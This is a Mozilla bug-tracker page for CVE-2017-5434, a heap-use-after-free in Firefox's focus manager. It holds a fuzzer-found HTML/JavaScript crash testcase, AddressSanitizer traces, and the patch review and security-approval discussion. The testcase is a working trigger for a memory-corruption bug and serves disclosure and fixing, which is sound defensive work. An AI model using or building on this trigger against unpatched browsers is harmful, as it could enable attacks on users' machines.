Closed
Bug 1349946
(CVE-2017-5434)
Opened 7 years ago
Closed 7 years ago
heap-use-after-free in nsFocusManager::CheckIfFocusable
Categories
(Core :: DOM: Core & HTML, defect)
Core
DOM: Core & HTML
Tracking
()
People
(Reporter: nils, Assigned: smaug)
Details
(Keywords: csectype-uaf, reporter-external, sec-high, Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage])
Attachments
(1 file)
|
2.76 KB,
patch
|
enndeakin
:
review+
abillings
:
approval-mozilla-aurora+
abillings
:
approval-mozilla-beta+
jcristau
:
approval-mozilla-esr45+
jcristau
:
approval-mozilla-esr52+
abillings
:
sec-approval+
|
Details | Diff | Splinter Review |
The following testcases crashes the latest ASAN build of Firefox (BuildID=20170322145832).
crash.html:
<script>
function start () {
o2=document.createElementNS('http://www.w3.org/1999/xhtml','div');
o8=document.createRange();
o16=document.createElementNS('http://www.w3.org/1999/xhtml','input');
o20=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
o21=o8.cloneRange();
o28=document.createElementNS('http://www.w3.org/1999/xhtml','strike');
o36=document.createElementNS('http://www.w3.org/1999/xhtml','tfoot');
o28.prepend("x","x","x");
o37=document.createElementNS('http://www.w3.org/1999/xhtml','area');
o28.appendChild(o2);
o56=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
o57=o2.previousSibling;
o83=document.createElementNS('http://www.w3.org/1999/xhtml','input');
o20.appendChild(o83);
document.documentElement.appendChild(o28);
o36.appendChild(o56);
o21.setStartBefore(o57);
o16.appendChild(o20);
document.documentElement.innerHTML='';
o21.surroundContents(o37);
o276=document.createRange();
o276.selectNode(o37);
o303=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
o83.appendChild(o303);
o276.insertNode(o36);
o56.contentWindow.onresize=fun0;
o639=window.top.frames[0];
o640=o639.document;
o641=o640.documentElement;
o645=window.top.frames[2];
o703=document.createElementNS('http://www.w3.org/1999/xhtml','input');
o703.type='number';
o641.appendChild(o703);
o703.focus();
}
function fun0() {
document.documentElement.appendChild(o703);
window.fuzzPriv.CC();
window.fuzzPriv.CC();
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==11515==ERROR: AddressSanitizer: heap-use-after-free on address 0x615000297cb0 at pc 0x7f3c5cb2be73 bp 0x7ffc1d1ee850 sp 0x7ffc1d1ee848
READ of size 4 at 0x615000297cb0 thread T0 (Web Content)
#0 0x7f3c5cb2be72 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1596:12
#1 0x7f3c5cb2be72 in IsInUncomposedDoc /home/worker/workspace/build/src/dom/base/nsINode.h:546
#2 0x7f3c5cb2be72 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:898
#3 0x7f3c5cb2be72 in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1570
#4 0x7f3c5cb2adf7 in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1542:12
#5 0x7f3c5cb33801 in nsFocusManager::Focus(nsPIDOMWindowOuter*, nsIContent*, unsigned int, bool, bool, bool, bool, nsIContent*) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1898:7
#6 0x7f3c5cb2959e in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1354:5
#7 0x7f3c5cb2a964 in nsFocusManager::SetFocus(nsIDOMElement*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:486:3
#8 0x7f3c5c8c8550 in mozilla::dom::Element::Focus(mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:311:18
#9 0x7f3c5ea0f4fe in mozilla::dom::HTMLInputElement::Focus(mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3504:27
#10 0x7f3c5e0fc70b in mozilla::dom::HTMLElementBinding::focus(JSContext*, JS::Handle<JSObject*>, nsGenericHTMLElement*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:462:9
#11 0x7f3c5e3990be in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
#12 0x7f3c63b2fe23 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#13 0x7f3c63b2fe23 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
#14 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#15 0x7f3c6473b93e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#16 0x7f3c646f2464 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
#17 0x7f3c6471bee3 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
#18 0x7f3c6471e847 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
#19 0x7f3c63b30173 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#20 0x7f3c63b30173 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
#21 0x7f3c63b18669 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#22 0x7f3c63b18669 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
#23 0x7f3c63afe5ce in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#24 0x7f3c63b2ffa8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#25 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#26 0x7f3c644ae4eb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
#27 0x7f3c5de3c2e5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#28 0x7f3c5e79e74b in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#29 0x7f3c5e79e74b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
#30 0x7f3c5e76b482 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:51
#31 0x7f3c5e76d26a in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
#32 0x7f3c5e7588a1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:16
#33 0x7f3c5e75bdf2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
#34 0x7f3c608844ec in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
#35 0x7f3c62c26929 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7671:21
#36 0x7f3c62c22b88 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7465:7
#37 0x7f3c62c29cdf in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
#38 0x7f3c5bad3d29 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
#39 0x7f3c5bad2cdc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:14
#40 0x7f3c5bacfb78 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
#41 0x7f3c5bad19f2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
#42 0x7f3c5bad271c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
#43 0x7f3c5a299e82 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:635:28
#44 0x7f3c5caeb95b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8888:18
#45 0x7f3c5cb860ff in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8839:11
#46 0x7f3c5a0b5f01 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:259:32
#47 0x7f3c5a0e7f10 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
#48 0x7f3c5a0e4958 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#49 0x7f3c5ae89ee1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#50 0x7f3c5adeb080 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
#51 0x7f3c5adeb080 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#52 0x7f3c5adeb080 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#53 0x7f3c600aa20f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
#54 0x7f3c636e4117 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:854:22
#55 0x7f3c5adeb080 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
#56 0x7f3c5adeb080 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#57 0x7f3c5adeb080 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#58 0x7f3c636e3b36 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:686:34
#59 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
#60 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
#61 0x7f3c755ef82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
#62 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x615000297cb0 is located 48 bytes inside of 504-byte region [0x615000297c80,0x615000297e78)
freed by thread T0 (Web Content) here:
#0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
#1 0x7f3c59f94297 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:25
#2 0x7f3c59f93e97 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
#3 0x7f3c59f9aebd in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3839:3
#4 0x7f3c59f9a6e1 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
#5 0x7f3c59f9d4b3 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4157:21
#6 0x7f3c5cbc9c92 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1452:3
#7 0x7f3c5c74121d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
#8 0x7f3c5a1026e1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
#9 0x7f3c5b8f8134 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
#10 0x7f3c5b8f8134 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
#11 0x7f3c5b8f8134 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
#12 0x7f3c5b8ff2dc in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
#13 0x7f3c63b2fe23 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#14 0x7f3c63b2fe23 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
#15 0x7f3c63b18669 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#16 0x7f3c63b18669 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
#17 0x7f3c63afe5ce in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#18 0x7f3c63b2ffa8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#19 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#20 0x7f3c644ac7e3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#21 0x7f3c5b841e1b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#22 0x7f3c63b2fe23 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#23 0x7f3c63b2fe23 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
#24 0x7f3c63b18669 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#25 0x7f3c63b18669 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
#26 0x7f3c63afe5ce in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#27 0x7f3c63b2ffa8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#28 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#29 0x7f3c6473b93e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#30 0x7f3c646f2464 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
#31 0x7f3c6471bee3 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
#32 0x7f3c6471e847 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
#33 0x7f3c63b30173 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#34 0x7f3c63b30173 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
#35 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#36 0x7f3c644ae4eb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
previously allocated by thread T0 (Web Content) here:
#0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f3c5e9deee9 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f3c5e9deee9 in NS_NewHTMLInputElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:126
#4 0x7f3c5eb71f59 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:287:41
#5 0x7f3c5eb71f59 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:259
#6 0x7f3c5cb0cfc2 in nsIDocument::CreateHTMLElement(nsIAtom*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:12861:28
#7 0x7f3c60c9cf5a in nsNumberControlFrame::MakeAnonymousElement(mozilla::dom::Element**, nsTArray<nsIAnonymousContentCreator::ContentInfo>&, nsIAtom*, mozilla::CSSPseudoElementType) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:332:40
#8 0x7f3c60c9d5c9 in nsNumberControlFrame::CreateAnonymousContent(nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:379:8
#9 0x7f3c608312be in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4224:26
#10 0x7f3c6082528a in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10984:3
#11 0x7f3c6083a2a0 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
#12 0x7f3c60844b6f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6247:3
#13 0x7f3c60826026 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10765:5
#14 0x7f3c60826026 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11069
#15 0x7f3c6082edb3 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12071:3
#16 0x7f3c6082b2ea in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2643:5
#17 0x7f3c6084dffa in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool, TreeMatchContext*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7859:7
#18 0x7f3c6084cac6 in nsCSSFrameConstructor::ContentInserted(nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7744:3
#19 0x7f3c607977c2 in mozilla::PresShell::Initialize(int, int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:1787:26
#20 0x7f3c6087f5aa in nsDocumentViewer::InitPresentationStuff(bool) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:722:12
#21 0x7f3c6088f3c9 in nsDocumentViewer::Show() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2123:12
#22 0x7f3c62c18559 in SetVisibility /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6513:9
#23 0x7f3c62c18559 in non-virtual thunk to nsDocShell::SetVisibility(bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6503
#24 0x7f3c5cb59be1 in nsFrameLoader::Show(int, int, int, int, nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1139:15
#25 0x7f3c60bda431 in nsSubDocumentFrame::ShowViewer() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:185:22
#26 0x7f3c60c534ab in AsyncFrameInit::Run() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:92:60
#27 0x7f3c5c7063ef in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5266:15
#28 0x7f3c607b0548 in ~nsAutoScriptBlocker /home/worker/workspace/build/src/obj-firefox/dist/include/nsContentUtils.h:2961:5
#29 0x7f3c607b0548 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4185
#30 0x7f3c5cae4971 in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:599:5
#31 0x7f3c5cae4971 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8032
#32 0x7f3c5cae4868 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8028:22
#33 0x7f3c5cb2af1b in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1552:8
#34 0x7f3c5cb278c2 in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1182:41
#35 0x7f3c5cb2a964 in nsFocusManager::SetFocus(nsIDOMElement*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:486:3
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1596:12 in GetBoolFlag
Shadow bytes around the buggy address:
0x0c2a8004af40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a8004af50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a8004af60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a8004af70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a8004af80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2a8004af90: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
0x0c2a8004afa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a8004afb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a8004afc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
0x0c2a8004afd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a8004afe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==11515==ABORTING
|
||
Updated•7 years ago
|
Group: core-security → dom-core-security
Keywords: csectype-uaf,
sec-critical
|
||
Comment 1•7 years ago
|
||
Tracking for 55 for now since we rated this sec-critical.
status-firefox52:
--- → ?
status-firefox53:
--- → ?
status-firefox54:
--- → ?
status-firefox55:
--- → affected
status-firefox-esr52:
--- → ?
tracking-firefox55:
--- → +
|
Assignee | |
Updated•7 years ago
|
Assignee: nobody → bugs
|
|
Assignee | |
Comment 2•7 years ago
|
||
Better to keep the arguments alive, per COM rules.
Attachment #8850780 -
Flags: review?(enndeakin)
|
||
Updated•7 years ago
|
Attachment #8850780 -
Flags: review?(enndeakin) → review+
|
|
Assignee | |
Comment 3•7 years ago
|
||
Comment on attachment 8850780 [details] [diff] [review] focusmanager_crash.diff [Security approval request comment] How easily could an exploit be constructed based on the patch? I don't think it is too easy Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? Message could be "Bug 1349946, ensure expected focus handling when redirecting focus, r=enndeakin" which isn't very clear, but then, these effectively kunguDeathGrips, which do pin point where the issue is Which older supported branches are affected by this flaw? All If not all supported branches, which bug introduced the flaw? Old code Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? Patch seems to apply to beta too How likely is this patch to cause regressions; how much testing does it need? Super safe
Attachment #8850780 -
Flags: sec-approval?
Attachment #8850780 -
Flags: approval-mozilla-beta?
Attachment #8850780 -
Flags: approval-mozilla-aurora?
|
||
Comment 4•7 years ago
|
||
Sec-approval+ for trunk. Once it lands, we'll want patches nominated for both of the ESR branches as well.
status-firefox-esr45:
--- → affected
tracking-firefox53:
--- → +
tracking-firefox54:
--- → +
tracking-firefox-esr45:
--- → 53+
tracking-firefox-esr52:
--- → 53+
|
|
||
Updated•7 years ago
|
Attachment #8850780 -
Flags: sec-approval?
Attachment #8850780 -
Flags: sec-approval+
Attachment #8850780 -
Flags: approval-mozilla-beta?
Attachment #8850780 -
Flags: approval-mozilla-beta+
Attachment #8850780 -
Flags: approval-mozilla-aurora?
Attachment #8850780 -
Flags: approval-mozilla-aurora+
|
|
Assignee | |
